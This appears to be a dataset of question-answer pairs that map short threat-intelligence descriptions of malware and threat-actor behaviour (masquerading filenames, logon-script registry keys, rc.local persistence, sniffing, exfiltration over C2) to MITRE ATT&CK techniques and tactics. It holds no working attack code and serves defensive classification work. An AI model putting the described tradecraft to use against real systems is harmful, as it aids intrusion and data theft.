+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has dropped DCSrv under the `svchost.exe` name to disk.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pysa has executed a malicious executable by naming it svchost.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT used the PowerShell filenames Office365DCOMCheck.ps1 and SystemDiskClean.ps1.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUIETEXIT has attempted to change its name to `cron` upon startup. During incident response, QUIETEXIT samples have been identified that were renamed to blend in with other legitimate files.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has masqueraded as VMware.exe.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can mimic the names of known executables.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Raindrop was installed under names that resembled legitimate Windows file and directory names.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay has used names to mimic legitimate software including ""vmtoolsd.exe"" to spoof Vmtools.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has masqueraded as a 7zip installer.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Remsec loader implements itself with the name Security Support Provider, a legitimate Windows function. Various Remsec .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare. Remsec also disguised malicious modules using similar filenames as custom network encryption software on victims.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RotaJakiro has used the filename `systemd-daemon` in an attempt to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has constructed legitimate appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as C:\Users\Public.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type may save itself as a file named `msdtc.exe`, which is also the name of the legitimate Microsoft Distributed Transaction Coordinator service binary.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA has mimicked the names of known executables, such as mediaplayer.exe.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNSPOT was identified on disk with a filename of taskhostsvc.exe and it created an encrypted log file at C:\Windows\Temp\vmware-vmdmp.log.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUPERNOVA has masqueraded as a legitimate SolarWinds DLL.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has been disguised as a legitimate executable, including as Windows SDK.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai has created the directory `%COMMONPROGRAMFILES%\Microsoft Shared\wmi\` to contain DLLs for loading successive stages.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark binaries have been named `audioddg.pdb` and `Winlangdb.pdb` in order to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRatReporter spoofed itself as AlphaZawgyl_font.exe, a specialized Unicode font.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has downloaded a DLL to the C:\windows\system32\drivers\ folder and renamed it with a .sys extension.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Skidmap has created a fake rm binary to replace the legitimate Linux binary.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can use variations of Microsoft and Outlook spellings, such as ""Microsift"", in its file names to avoid detection.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SocGholish has been named `AutoUpdater.js` to mimic legitimate update files.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Starloader has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater has been named `calc.exe` to appear as a legitimate calculator program.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrongPity has been bundled with legitimate software installation files for disguise.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The TAINTEDSCRIBE main executable has disguised itself as Microsoft’s Narrator.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEARDROP files had names that resembled legitimate Window file and directory names.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask has masqueraded as executable files such as `winupdate.exe`, `date.exe`, or `win.exe`.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest prepends a copy of itself to the beginning of an executable file while maintaining the name of the executable.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThreatNeedle chooses its payload creation path from a randomly selected service name from netsvc.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla has been deployed as `w64time.dll` to appear legitimate.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBStealer mimics a legitimate Russian program called USB Disk Security.,"Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Winnti for Windows implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib mimics the resource version information of legitimate Realtek Semiconductor, Nvidia, or Synaptics modules.","Tecnique: T1036.005 Masquerading: Match Legitimate Name or Location, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap puts a space after a false .jpg extension so that execution actually goes through the Terminal.app program.,"Tecnique: T1036.006 Masquerading: Space after Filename, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used an additional filename extension to hide the true file type.,"Tecnique: T1036.007 Masquerading: Double File Extension, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Bazar loader has used dual-extension executable files such as PreviewReport.DOC.exe.,"Tecnique: T1036.007 Masquerading: Double File Extension, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate masquerades malicious LNK files as PDF objects using the double extension .pdf.lnk.,"Tecnique: T1036.007 Masquerading: Double File Extension, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan has used an executable named `companycatalog.exe.config` to appear benign.,"Tecnique: T1036.007 Masquerading: Double File Extension, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team masqueraded executables as `.txt` files.","Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group disguised malicious template files as JPEG files to avoid detection.","Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has appended copies of the ntds.dit database with a .gif file extension.,"Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA has been delivered through a LNK file disguised as a folder.,"Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AvosLocker has been disguised as a .jpg file.,"Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 has used Microsoft Word icons to hide malicious LNK files.,"Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D has disguised it's true file structure as an application bundle by adding special characters to the filename and using the icon for legitimate Word documents.,"Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The QakBot payload has been disguised as a PNG file and hidden within LNK files using a Microsoft File Explorer icon.,"Tecnique: T1036.008 Masquerading: Masquerade File Type, Tactic: TA0005 Defense Evasion"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has hijacked legitimate application-specific startup scripts to enable malware to execute on system startup.,"Tecnique: T1037 Boot or Logon Initialization Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has installed an ""init.d"" startup script to maintain persistence.","Tecnique: T1037 Boot or Logon Initialization Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Depending on the Linux distribution and when executing with root permissions, RotaJakiro may install persistence using a `.conf` file in the `/etc/init/` folder.","Tecnique: T1037 Boot or Logon Initialization Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT28 loader Trojan adds the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.,"Tecnique: T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows), Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has added persistence by registering the file name for the next stage malware under HKCU\Environment\UserInitMprLogonScript.,"Tecnique: T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows), Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher can establish persistence via adding a Registry key with a logon script HKEY_CURRENT_USER\Environment ""UserInitMprLogonScript"" .","Tecnique: T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows), Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT has registered a Windows shell script under the Registry key HKCU\Environment\UserInitMprLogonScript to establish persistence.,"Tecnique: T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows), Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY has the ability to set the HKCU\Environment\UserInitMprLogonScript Registry key to execute logon scripts.,"Tecnique: T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows), Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy performs persistence with a logon script via adding to the Registry key HKCU\Environment\UserInitMprLogonScript.,"Tecnique: T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows), Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has installed a run command on a compromised system to enable malware execution on system startup.,"Tecnique: T1037.004 Boot or Logon Initialization Scripts: RC Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has the ability to execute on device startup, using a modified RC script named S51armled.","Tecnique: T1037.004 Boot or Logon Initialization Scripts: RC Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can add init.d and rc.d files in the /etc folder to establish persistence.,"Tecnique: T1037.004 Boot or Logon Initialization Scripts: RC Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HiddenWasp installs reboot persistence by adding itself to /etc/rc.local.,"Tecnique: T1037.004 Boot or Logon Initialization Scripts: RC Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten adds an entry to the rc.common file for persistence.,"Tecnique: T1037.004 Boot or Logon Initialization Scripts: RC Scripts, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can list and manage startup entries.,"Tecnique: T1037.005 Boot or Logon Initialization Scripts: Startup Items, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors collected files from network shared drives prior to network encryption.","Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has collected files from network shared drives.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has exfiltrated files stolen from file shares.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has collected data of interest from network shares.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has searched network shares to access sensitive documents.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug extracted Word documents from a file server on a victim network.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has collected data from remote systems by mounting network shares with net use and using Robocopy to transfer data.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When it first starts, BADNEWS crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt.","Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke steals user files from network shared drives with file extensions and keywords that match a predefined list.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can collect any files found in the enumerated drivers before sending it to its C2 channel.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can collect data from network drives and stage it for exfiltration.,"Tecnique: T1039 Data from Network Shared Drive, Tactic: TA0009 Collection"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy’s network sniffer module to discover user credentials being sent over the network between the local LAN and the power grid’s industrial control systems.","Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials.","Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has used SniffPass to collect credentials by sniffing network traffic.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya used network sniffing to obtain login data.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used intercepter-NG to sniff passwords in network traffic.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed to hook network APIs to monitor network traffic.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can be used to conduct packet captures on target hosts.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Impacket can be used to sniff network traffic via an interface or raw socket.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata.","Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NBTscan can dump and print whole packet content.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Penquin can sniff network traffic to look for packets matching specific conditions.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains a module for taking packet captures on compromised hosts.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Regin appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB.","Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Responder captures hashes and credentials that are sent to the system after the name services have been poisoned.,"Tecnique: T1040 Network Sniffing, Tactic: TA0006 Credential Access TA0007 Discovery "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors collected information via Empire, which sent the data back to the adversary's C2.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group exfiltrated data from a compromised host to actor-controlled C2 servers.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used the XServer backdoor to exfiltrate data.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that exfiltrates data over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor has exfiltrated data using the already opened channel with its C&C server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has exfiltrated stolen victim data through C2 communications.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used Cobalt Strike C2 beacons for data exfiltration.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has exfiltrated stolen files to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A Gamaredon Group file stealer can transfer collected files to a hardcoded C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Higaisa exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has exfiltrated data and files over a C2 channel through its various tools and malware.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has exfiltrated data over its C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used malware that exfiltrates stolen data to its C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used C2 infrastructure to receive exfiltrated data.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has sent system information to its C2 server using HTTP.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: After data is collected by Stealth Falcon malware, it is exfiltrated over the existing C2 channel.","Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has exfiltrated domain credentials and network enumeration information over command and control (C2) channels.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has exfiltrated files via the Dropbox API C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL exfiltrates data over the same channel used for C2.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has sent victim data to its C2 servers.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has exfiltrated collected host information to a C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can exfiltrate files via the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth exfiltrates collected information from its r1.log file to the external C2 server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor has exfiltrated data over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuTo Stealer can exfiltrate data over actor-controlled C2 servers via HTTP or TCP.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Adversaries can direct BACKSPACE to upload files to the C2 Server.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can exfiltrate data over the C2 channel.,"Tecnique: T1041 Exfiltration Over C2 Channel, Tactic: TA0010 Exfiltration"
